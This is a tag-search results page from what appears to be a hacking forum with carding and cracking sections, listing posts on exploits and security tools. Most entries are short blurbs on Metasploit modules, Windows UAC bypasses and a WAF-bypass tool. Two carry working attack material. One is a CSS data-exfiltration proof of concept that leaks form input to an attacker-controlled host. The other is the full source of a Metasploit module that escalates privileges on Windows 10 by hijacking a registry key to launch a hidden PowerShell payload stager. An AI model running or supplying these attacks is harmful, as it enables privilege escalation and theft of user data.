Search the Community

Showing results for tags 'protection'.

The search index is currently processing. Current results may not be complete.


More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 13 results

  1. Enterprise Remote Desktop Security. Intelligent Solutions for the Modern Workspace. Offices are decentralizing. Remote offices and mobile employees are at an all-time high. With the increased flexibility that comes with working in a remote environment, there are also increased risks. Malware and Ransomware run rampant on the internet. Login information is vulnerable. Strong passwords and careful users just aren’t enough to ensure security anymore. RDS-Knight is the intelligent solution. With RDS-Knight, Administrators can use a wide array of flexible tools to control access to remote servers. Designed by security experts and updated regularly, RDS-Knight stays on the cutting edge of remote desktop security. With the recent update to Version 4.0, RDS-Knight continues to lead the way in bringing easy to manage, highly configurable security solutions to businesses around the world. [Hidden Content] [HIDE][Hidden Content]]
  2. 0x1

    CSS Exfil Protection

    Introducing CSS Exfil Several months ago I began tinkering with Chrome's XSS auditor looking for bypasses. One remote injection method which reliably got through Chrome's filter was CSS injection. By utilizing injected CSS, an attacker essentially has complete control over the look-and-feel of a page. I also discovered an attacker can leverage CSS to steal form data. By utilizing CSS alone, browser protections like NoScript can't block the egress of data (although NoScript's XSS auditor is more effective than Chrome at blocking some of the injection Proof of Concept attacks detailed below). While CSS injection is not a new vulnerability, using CSS as the sole attack vector to reliably exfiltrate data - to my knowledge - has never been presented. I am also not aware of any effective method previously documented to guard end users against such attack - other than to block CSS, which is not a practical solution. Related Work The only mention I could find of a similar egress method, is [Hidden Content], which demonstrates how CSS can be used to beacon an attacker when certain data is present on a web page. (Admittedly, I found this page later when researching possible mitigation techniques.) A couple weeks ago I also became aware of a GitHub project dubbed [Hidden Content], which uses CSS to track web users. Methods of Exploitation There are a variety of attack scenarios which can leverage CSS Exfil, including: Reflected or stored code injection flaws (e.g. any page vulnerable to XSS) Hijacked or malicious 3rd party resources intentionally or accidentally included within the DOM (Document Object Model) of the target element. e.g.: Web tracker snippits Remarketing code Advertisements which are not not encapsulated within an iframe Web development plugins/libraries/frameworks Malicious or hijacked browser extensions Anatomy of the Attack The CSS Exfil attack centers around the CSS 'value selectors', which can be used to parse HTML tag attribute data. Here is a summary of these selectors: [attribute=value] [foo=bar] Selects all elements with foo="bar" [attribute~=value] [foo~=bar] Selects all elements with a foo attribute containing the word "bar" [attribute|=value] [foo|=bar] Selects all elements with a foo attribute value starting with "bar" [attribute^=value] [foo^="bar"] Selects all elements with a foo attribute value starting with "bar" [attribute$=value] [foo$="bar"] Selects all elements with a foo attribute value ending with "bar" [attribute*=value] [foo*="bar"] Selects all elements with a foo attribute which contains the substring "bar" This simple example demonstrates how these selectors can be abused: <style> #username[value="mikeg"] { background:url("[Hidden Content]"); } </style> <input id="username" value="mikeg" /> In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded on a remote host controlled by the attacker, indicating the value of the input is 'mikeg'. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks. Proof of Concept Basic CSS Exfil example which shows how malicious CSS/HTML can be used to leak page data. <html> <head> <style> #username[value*="aa"]~#aa{background:url("[Hidden Content]");}#username[value*="ab"]~#ab{background:url("[Hidden Content]");}#username[value*="ac"]~#ac{background:url("[Hidden Content]");}#username[value^="a"]~#a_{background:url("[Hidden Content]_");}#username[value$="a"]~#_a{background:url("[Hidden Content]");}#username[value*="ba"]~#ba{background:url("[Hidden Content]");}#username[value*="bb"]~#bb{background:url("[Hidden Content]");}#username[value*="bc"]~#bc{background:url("[Hidden Content]");}#username[value^="b"]~#b_{background:url("[Hidden Content]_");}#username[value$="b"]~#_b{background:url("[Hidden Content]");}#username[value*="ca"]~#ca{background:url("[Hidden Content]");}#username[value*="cb"]~#cb{background:url("[Hidden Content]");}#username[value*="cc"]~#cc{background:url("[Hidden Content]");}#username[value^="c"]~#c_{background:url("[Hidden Content]_");}#username[value$="c"]~#_c{background:url("[Hidden Content]");} </style> </head> <body> <form> Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" /> <input id="form_submit" type="submit" value="submit"/> <a id="aa"><a id="ab"><a id="ac"><a id="a_"><a id="_a"><a id="ba"><a id="bb"><a id="bc"><a id="b_"><a id="_b"><a id="ca"><a id="cb"><a id="cc"><a id="c_"><a id="_c"> </form> </body> </html> The above example isn't all that realistic but it demonstrates the fundamentals of the CSS Exfil attack. When a user enters any string consisting of the letters 'a' 'b 'c', specific elements will be styled with a non-existent background image at a remote attacker URL. For the attack to succeed three conditions need to be in place: Upon visiting hxxps://victim[.]host/css-exfil-poc1[.]php?username=abcab, the attacker will receive data like this. 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ab HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /a_ HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /bc HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /_b HTTP/1.1" 404 22 127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ca HTTP/1.1" 404 22 Which can be re-assembled like this: a # a_ ab # ab abc # bc abca # ca abcab # _b The malicious CSS utilizes pattern matching for two character combinations ('aa', 'ab', 'ac'...) as well as detection of the first and last letter of the string ('a_' & '_a' callbacks). This method provides a reliable method of reconstructing data. The limitation is that repeating patterns may not always be apparent and reconstruction may sometimes require human intelligence if the data decodes to multiple strings. Why not use three character matching or longer? In a word: practicality. If the structure of the data can be anticipated it may be possible to use longer strings, which I will illustrate below. The more targeted the attack the more it becomes possible to make better data predictions and reduce the CSS footprint. But in general, the two-character first/last-character approach provides the best performance to attack footprint. All two letter English alphabet lower case alphabet permutations work out to P(26,2) = 650. Three character permutations increases the footprint to P(26,3) = 15,600, making it much more unlikely that Condition #2 will be possible. This table describes the attributes of various attack alphabet. Alphabet Regex Calculation Required Elements Estimated CSS Payload Numeric [0-9] P(10,2) + (10 * 2) 110 7.7 KB Lowercase [a-z] P(26,2) + (26 * 2) 702 49.14 KB Lower/uppercase [A-Za-z] P(52,2) + (52 * 2) 2,756 192.92 KB Lower/uppercase / Numeric [A-Za-z0-9] P(62,2) + (62 * 2) 3,906 273.42 KB Lower/uppercase / Numeric / 32 symbols P(94,2) + (92 * 2) 8,926 624.82 KB Depending where the targeted data element resides within a page, large alphabets may be possible without HTML injection. Running document.getElementsByTagName('*').length; in your browser console will display the total number of DOM (Document Object Model) elements on a page, which can provide an upper bound. For example, my homepage (at the time of this writing) has ~750 DOM elements in total. A test of Slashdot yielded ~2,100 elements and Google News yielded ~6,900 elements! That's not to say that each DOM element can be properly referenced by the target element, but it gives an upper bound on what may be possible without additional DOM injection. Condition #1: The data being parsed must be present on page load Condition #2: There must be one or more elements which can be referenced via a CSS selector relative to the data element Condition #3: The element must be styled with a CSS property which takes a URL (e.g. background / background-image, list-style / list-style-image, or cursor). More info && Download [Hidden Content]
  3. This Metasploit module exploits an Authenticated user with permission to upload and manage media contents can upload various files on the server. Application prevents the user from uploading PHP code by checking the file extension. It uses black-list based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). This module was tested on October CMS version version 1.0.412 on Ubuntu. View the full article
  4. This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). View the full article
  5. This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. View the full article
  6. Microsoft Office365 and ProPlus build 16.0.11901.20204 suffers from code execution and protection bypass vulnerabilities. View the full article
  7. WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of “There’s a WAF?”. WhatWaf works by detecting a firewall on a web application and attempting to detect a bypass (or two) for said firewall, on the specified target. Features Ability to run on a single URL with the -u/--url flag Ability to run through a list of URL’s with the -l/--list flag Ability to detect over 40 different firewalls Ability to try over 20 different tampering techniques Ability to pass your own payloads either from a file, from the terminal, or use the default payloads Default payloads that are guaranteed to produce at least one WAF triggering Ability to bypass firewalls using both SQLi techniques and cross-site scripting techniques Ability to run behind multiple proxy types (socks4, socks5, http, https, and Tor) Ability to use a random user agent, personal user agent, or custom default user agent Auto-assign protocol to HTTP or ability to force protocol to HTTPS A built-in encoder so you can encode your payloads into the discovered bypasses More to come… Changelog v1.5.4 minor update to Cloudflare detection via issue #299 [HIDE][Hidden Content]]
  8. There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. View the full article
  9. WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of “There’s a WAF?”. WhatWaf works by detecting a firewall on a web application and attempting to detect a bypass (or two) for said firewall, on the specified target. Features Ability to run on a single URL with the -u/--url flag Ability to run through a list of URL’s with the -l/--list flag Ability to detect over 40 different firewalls Ability to try over 20 different tampering techniques Ability to pass your own payloads either from a file, from the terminal, or use the default payloads Default payloads that are guaranteed to produce at least one WAF triggering Ability to bypass firewalls using both SQLi techniques and cross-site scripting techniques Ability to run behind multiple proxy types (socks4, socks5, http, https, and Tor) Ability to use a random user agent, personal user agent, or custom default user agent Auto-assign protocol to HTTP or ability to force protocol to HTTPS A built-in encoder so you can encode your payloads into the discovered bypasses More to come… [Hidden Content]
  10. This script is a proof of concept to bypass the Microsoft Windows User Access Control (UAC) via SluiFileHandlerHijackLPE. View the full article
  11. dEEpEst

    What Is the DDoS Protection Bootcamp?

    [Hidden Content]
  12. ## # This module requires Metasploit: [Hidden Content] # Current source: [Hidden Content] ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::Windows::Priv include Post::Windows::Registry include Post::Windows::Runas COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze EXEC_REG_VAL = ''.freeze # This maps to "(Default)" EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze CMD_MAX_LEN = 16383 def initialize(info = {}) super( update_info( info, 'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)', 'Description' => %q{ This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows computerdefault.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ 'St0rn - Synetis.com', # UAC bypass discovery and research 'St0rn - [email protected]', # MSF module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', '[Hidden Content]' ] ], 'DisclosureDate' => 'October 22 2018' ) ) end def check if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 if session.arch == ARCH_X86 # fodhelper.exe is x64 only exe commspec = '%WINDIR%\\Sysnative\\cmd.exe' if target_arch.first == ARCH_X64 # We can't use absolute path here as # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session psh_path = "powershell.exe" end end if target_arch.first == ARCH_X86 # Invoking x86, so switch to SysWOW64 psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" end else # if we're on x86, we can't handle x64 payloads if target_arch.first == ARCH_X64 fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') end end if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end # Validate that we can actually do things before we bother # doing any more work check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end payload_value = rand_text_alpha(8) psh_path = expand_path(psh_path) template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) if psh_payload.length > CMD_MAX_LEN fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") end psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? if existing.empty? registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view) end print_status("Configuring payload and stager registry keys ...") unless exist_delegate registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) end registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}") print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? Rex::sleep(5) handler(client) print_status("Cleaining up registry keys ...") unless exist_delegate registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) end if existing.empty? registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view) else registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view) end def check_permissions! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end print_status('UAC is Enabled, checking level...') if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end
  13. 1337day-Exploits

    Windows UAC Protection Bypass

    This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. View the full article